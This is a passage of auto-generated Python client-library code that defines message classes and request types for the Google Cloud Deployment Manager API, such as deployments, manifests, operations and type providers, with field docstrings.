update: [Output Only] If Deployment Manager is currently updating or
previewing an update to this deployment, the updated configuration
appears here.
"""
description = _messages.StringField(1)
fingerprint = _messages.BytesField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
labels = _messages.MessageField('DeploymentLabelEntry', 5, repeated=True)
manifest = _messages.StringField(6)
name = _messages.StringField(7)
operation = _messages.MessageField('Operation', 8)
selfLink = _messages.StringField(9)
target = _messages.MessageField('TargetConfiguration', 10)
update = _messages.MessageField('DeploymentUpdate', 11)
class DeploymentLabelEntry(_messages.Message):
"""A DeploymentLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class DeploymentUpdate(_messages.Message):
"""DeploymentUpdate message type.
Fields:
description: [Output Only] An optional user-provided description of the
deployment after the current update has been applied.
labels: [Output Only] Map of labels; provided by the client when the
resource is created or updated. Specifically: Label keys must be between
1 and 63 characters long and must conform to the following regular
expression: [a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0
and 63 characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
manifest: [Output Only] URL of the manifest representing the update
configuration of this deployment.
"""
description = _messages.StringField(1)
labels = _messages.MessageField('DeploymentUpdateLabelEntry', 2, repeated=True)
manifest = _messages.StringField(3)
class DeploymentUpdateLabelEntry(_messages.Message):
"""A DeploymentUpdateLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class DeploymentmanagerCompositeTypesDeleteRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesDeleteRequest object.
Fields:
compositeType: The name of the type for this request.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesGetRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesGetRequest object.
Fields:
compositeType: The name of the composite type for this request.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesInsertRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesInsertRequest object.
Fields:
compositeType: A CompositeType resource to be passed as the request body.
project: The project ID for this request.
"""
compositeType = _messages.MessageField('CompositeType', 1)
project = _messages.StringField(2, required=True)
class DeploymentmanagerCompositeTypesListRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerCompositeTypesPatchRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesPatchRequest object.
Fields:
compositeType: The name of the composite type for this request.
compositeTypeResource: A CompositeType resource to be passed as the
request body.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
compositeTypeResource = _messages.MessageField('CompositeType', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerCompositeTypesUpdateRequest(_messages.Message):
"""A DeploymentmanagerCompositeTypesUpdateRequest object.
Fields:
compositeType: The name of the composite type for this request.
compositeTypeResource: A CompositeType resource to be passed as the
request body.
project: The project ID for this request.
"""
compositeType = _messages.StringField(1, required=True)
compositeTypeResource = _messages.MessageField('CompositeType', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsCancelPreviewRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsCancelPreviewRequest object.
Fields:
deployment: The name of the deployment for this request.
deploymentsCancelPreviewRequest: A DeploymentsCancelPreviewRequest
resource to be passed as the request body.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
deploymentsCancelPreviewRequest = _messages.MessageField('DeploymentsCancelPreviewRequest', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsDeleteRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsDeleteRequest object.
Enums:
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
project: The project ID for this request.
"""
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 1, default=u'DELETE')
deployment = _messages.StringField(2, required=True)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsGetIamPolicyRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsGetIamPolicyRequest object.
Fields:
project: Project ID for this request.
resource: Name of the resource for this request.
"""
project = _messages.StringField(1, required=True)
resource = _messages.StringField(2, required=True)
class DeploymentmanagerDeploymentsGetRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsGetRequest object.
Fields:
deployment: The name of the deployment for this request.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerDeploymentsInsertRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsInsertRequest object.
Fields:
deployment: A Deployment resource to be passed as the request body.
preview: If set to true, creates a deployment and creates "shell"
resources but does not actually instantiate these resources. This allows
you to preview what your deployment looks like. After previewing a
deployment, you can deploy your resources by making a request with the
update() method or you can use the cancelPreview() method to cancel the
preview altogether. Note that the deployment will still exist after you
cancel the preview and you must separately delete this deployment if you
want to remove it.
project: The project ID for this request.
"""
deployment = _messages.MessageField('Deployment', 1)
preview = _messages.BooleanField(2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsListRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerDeploymentsPatchRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsPatchRequest object.
Enums:
CreatePolicyValueValuesEnum: Sets the policy to use for creating new
resources.
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
createPolicy: Sets the policy to use for creating new resources.
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
deploymentResource: A Deployment resource to be passed as the request
body.
preview: If set to true, updates the deployment and creates and updates
the "shell" resources but does not actually alter or instantiate these
resources. This allows you to preview what your deployment will look
like. You can use this intent to preview how an update would affect your
deployment. You must provide a target.config with a configuration if
this is set to true. After previewing a deployment, you can deploy your
resources by making a request with the update() or you can
cancelPreview() to remove the preview altogether. Note that the
deployment will still exist after you cancel the preview and you must
separately delete this deployment if you want to remove it.
project: The project ID for this request.
"""
class CreatePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for creating new resources.
Values:
ACQUIRE: <no description>
CREATE_OR_ACQUIRE: <no description>
"""
ACQUIRE = 0
CREATE_OR_ACQUIRE = 1
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
createPolicy = _messages.EnumField('CreatePolicyValueValuesEnum', 1, default=u'CREATE_OR_ACQUIRE')
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 2, default=u'DELETE')
deployment = _messages.StringField(3, required=True)
deploymentResource = _messages.MessageField('Deployment', 4)
preview = _messages.BooleanField(5, default=False)
project = _messages.StringField(6, required=True)
class DeploymentmanagerDeploymentsSetIamPolicyRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsSetIamPolicyRequest object.
Fields:
policy: A Policy resource to be passed as the request body.
project: Project ID for this request.
resource: Name of the resource for this request.
"""
policy = _messages.MessageField('Policy', 1)
project = _messages.StringField(2, required=True)
resource = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsStopRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsStopRequest object.
Fields:
deployment: The name of the deployment for this request.
deploymentsStopRequest: A DeploymentsStopRequest resource to be passed as
the request body.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
deploymentsStopRequest = _messages.MessageField('DeploymentsStopRequest', 2)
project = _messages.StringField(3, required=True)
class DeploymentmanagerDeploymentsTestIamPermissionsRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsTestIamPermissionsRequest object.
Fields:
project: Project ID for this request.
resource: Name of the resource for this request.
testPermissionsRequest: A TestPermissionsRequest resource to be passed as
the request body.
"""
project = _messages.StringField(1, required=True)
resource = _messages.StringField(2, required=True)
testPermissionsRequest = _messages.MessageField('TestPermissionsRequest', 3)
class DeploymentmanagerDeploymentsUpdateRequest(_messages.Message):
"""A DeploymentmanagerDeploymentsUpdateRequest object.
Enums:
CreatePolicyValueValuesEnum: Sets the policy to use for creating new
resources.
DeletePolicyValueValuesEnum: Sets the policy to use for deleting
resources.
Fields:
createPolicy: Sets the policy to use for creating new resources.
deletePolicy: Sets the policy to use for deleting resources.
deployment: The name of the deployment for this request.
deploymentResource: A Deployment resource to be passed as the request
body.
preview: If set to true, updates the deployment and creates and updates
the "shell" resources but does not actually alter or instantiate these
resources. This allows you to preview what your deployment will look
like. You can use this intent to preview how an update would affect your
deployment. You must provide a target.config with a configuration if
this is set to true. After previewing a deployment, you can deploy your
resources by making a request with the update() or you can
cancelPreview() to remove the preview altogether. Note that the
deployment will still exist after you cancel the preview and you must
separately delete this deployment if you want to remove it.
project: The project ID for this request.
"""
class CreatePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for creating new resources.
Values:
ACQUIRE: <no description>
CREATE_OR_ACQUIRE: <no description>
"""
ACQUIRE = 0
CREATE_OR_ACQUIRE = 1
class DeletePolicyValueValuesEnum(_messages.Enum):
"""Sets the policy to use for deleting resources.
Values:
ABANDON: <no description>
DELETE: <no description>
"""
ABANDON = 0
DELETE = 1
createPolicy = _messages.EnumField('CreatePolicyValueValuesEnum', 1, default=u'CREATE_OR_ACQUIRE')
deletePolicy = _messages.EnumField('DeletePolicyValueValuesEnum', 2, default=u'DELETE')
deployment = _messages.StringField(3, required=True)
deploymentResource = _messages.MessageField('Deployment', 4)
preview = _messages.BooleanField(5, default=False)
project = _messages.StringField(6, required=True)
class DeploymentmanagerManifestsGetRequest(_messages.Message):
"""A DeploymentmanagerManifestsGetRequest object.
Fields:
deployment: The name of the deployment for this request.
manifest: The name of the manifest for this request.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
manifest = _messages.StringField(2, required=True)
project = _messages.StringField(3, required=True)
class DeploymentmanagerManifestsListRequest(_messages.Message):
"""A DeploymentmanagerManifestsListRequest object.
Fields:
deployment: The name of the deployment for this request.
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
filter = _messages.StringField(2)
maxResults = _messages.IntegerField(3, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(4)
pageToken = _messages.StringField(5)
project = _messages.StringField(6, required=True)
class DeploymentmanagerOperationsGetRequest(_messages.Message):
"""A DeploymentmanagerOperationsGetRequest object.
Fields:
operation: The name of the operation for this request.
project: The project ID for this request.
"""
operation = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerOperationsListRequest(_messages.Message):
"""A DeploymentmanagerOperationsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerResourcesGetRequest(_messages.Message):
"""A DeploymentmanagerResourcesGetRequest object.
Fields:
deployment: The name of the deployment for this request.
project: The project ID for this request.
resource: The name of the resource for this request.
"""
deployment = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
resource = _messages.StringField(3, required=True)
class DeploymentmanagerResourcesListRequest(_messages.Message):
"""A DeploymentmanagerResourcesListRequest object.
Fields:
deployment: The name of the deployment for this request.
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
filter = _messages.StringField(2)
maxResults = _messages.IntegerField(3, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(4)
pageToken = _messages.StringField(5)
project = _messages.StringField(6, required=True)
class DeploymentmanagerTypeProvidersDeleteRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersDeleteRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
class DeploymentmanagerTypeProvidersGetRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersGetRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
class DeploymentmanagerTypeProvidersInsertRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersInsertRequest object.
Fields:
project: The project ID for this request.
typeProvider: A TypeProvider resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.MessageField('TypeProvider', 2)
class DeploymentmanagerTypeProvidersListRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerTypeProvidersPatchRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersPatchRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
typeProviderResource: A TypeProvider resource to be passed as the request
body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
typeProviderResource = _messages.MessageField('TypeProvider', 3)
class DeploymentmanagerTypeProvidersUpdateRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersUpdateRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
typeProviderResource: A TypeProvider resource to be passed as the request
body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
typeProviderResource = _messages.MessageField('TypeProvider', 3)
class DeploymentmanagerTypesDeleteRequest(_messages.Message):
"""A DeploymentmanagerTypesDeleteRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
class DeploymentmanagerTypesGetRequest(_messages.Message):
"""A DeploymentmanagerTypesGetRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
class DeploymentmanagerTypesInsertRequest(_messages.Message):
"""A DeploymentmanagerTypesInsertRequest object.
Fields:
project: The project ID for this request.
type: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.MessageField('Type', 2)
class DeploymentmanagerTypesListRequest(_messages.Message):
"""A DeploymentmanagerTypesListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerTypesPatchRequest(_messages.Message):
"""A DeploymentmanagerTypesPatchRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
typeResource: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
typeResource = _messages.MessageField('Type', 3)
class DeploymentmanagerTypesUpdateRequest(_messages.Message):
"""A DeploymentmanagerTypesUpdateRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
typeResource: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
typeResource = _messages.MessageField('Type', 3)
class DeploymentsCancelPreviewRequest(_messages.Message):
"""DeploymentsCancelPreviewRequest message type.
Fields:
fingerprint: Specifies a fingerprint for cancelPreview() requests. A
fingerprint is a randomly generated value that must be provided in
cancelPreview() requests to perform optimistic locking. This ensures
optimistic concurrency so that the deployment does not have conflicting
requests (e.g. if someone attempts to make a new update request while
another user attempts to cancel a preview, this would prevent one of the
requests). The fingerprint is initially generated by Deployment Manager
and changes after every request to modify a deployment. To get the
latest fingerprint value, perform a get() request on the deployment.
"""
fingerprint = _messages.BytesField(1)
class DeploymentsListResponse(_messages.Message):
"""A response containing a partial list of deployments and a page token used
to build the next request if the request has been truncated.
Fields:
deployments: [Output Only] The deployments contained in this response.
nextPageToken: [Output Only] A token used to continue a truncated list
request.
"""
deployments = _messages.MessageField('Deployment', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class DeploymentsStopRequest(_messages.Message):
"""DeploymentsStopRequest message type.
Fields:
fingerprint: Specifies a fingerprint for stop() requests. A fingerprint is
a randomly generated value that must be provided in stop() requests to
perform optimistic locking. This ensures optimistic concurrency so that
the deployment does not have conflicting requests (e.g. if someone
attempts to make a new update request while another user attempts to
stop an ongoing update request, this would prevent a collision). The
fingerprint is initially generated by Deployment Manager and changes
after every request to modify a deployment. To get the latest
fingerprint value, perform a get() request on the deployment.
"""
fingerprint = _messages.BytesField(1)
class ImportFile(_messages.Message):
"""ImportFile message type.
Fields:
content: The contents of the file.
name: The name of the file.
"""
content = _messages.StringField(1)
name = _messages.StringField(2)
class InputMapping(_messages.Message):
"""InputMapping creates a 'virtual' property that will be injected into the
properties before sending the request to the underlying API.
Fields:
fieldName: The name of the field that is going to be injected.
location: The location where this mapping applies.
methodMatch: Regex to evaluate on method to decide if input applies.
value: A jsonPath expression to select an element.
"""
fieldName = _messages.StringField(1)
location = _messages.StringField(2)
methodMatch = _messages.StringField(3)
value = _messages.StringField(4)
class LogConfig(_messages.Message):
"""Specifies what kind of log the caller must write
Fields:
counter: Counter options.
"""
counter = _messages.MessageField('LogConfigCounterOptions', 1)
class LogConfigCounterOptions(_messages.Message):
"""Options for counters
Fields:
field: The field value to attribute.
metric: The metric to update.
"""
field = _messages.StringField(1)
metric = _messages.StringField(2)
class Manifest(_messages.Message):
"""Manifest message type.
Fields:
config: [Output Only] The YAML configuration for this manifest.
expandedConfig: [Output Only] The fully-expanded configuration file,
including any templates and references.
id: [Output Only] Unique identifier for the resource; defined by the
server.
imports: [Output Only] The imported files for this manifest.
insertTime: [Output Only] Timestamp when the manifest was created, in
RFC3339 text format.
layout: [Output Only] The YAML layout for this manifest.
name: [Output Only] The name of the manifest.
selfLink: [Output Only] Self link for the manifest.
"""
config = _messages.MessageField('ConfigFile', 1)
expandedConfig = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
imports = _messages.MessageField('ImportFile', 4, repeated=True)
insertTime = _messages.StringField(5)
layout = _messages.StringField(6)
name = _messages.StringField(7)
selfLink = _messages.StringField(8)
class ManifestsListResponse(_messages.Message):
"""A response containing a partial list of manifests and a page token used
to build the next request if the request has been truncated.
Fields:
manifests: [Output Only] Manifests contained in this list response.
nextPageToken: [Output Only] A token used to continue a truncated list
request.
"""
manifests = _messages.MessageField('Manifest', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Operation(_messages.Message):
"""An Operation resource, used to manage asynchronous API requests.
Messages:
ErrorValue: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
clientOperationId: [Output Only] Reserved for future use.
creationTimestamp: [Deprecated] This field is deprecated.
description: [Output Only] A textual description of the operation, which
is set when the operation is created.
endTime: [Output Only] The time that this operation was completed. This
value is in RFC3339 text format.
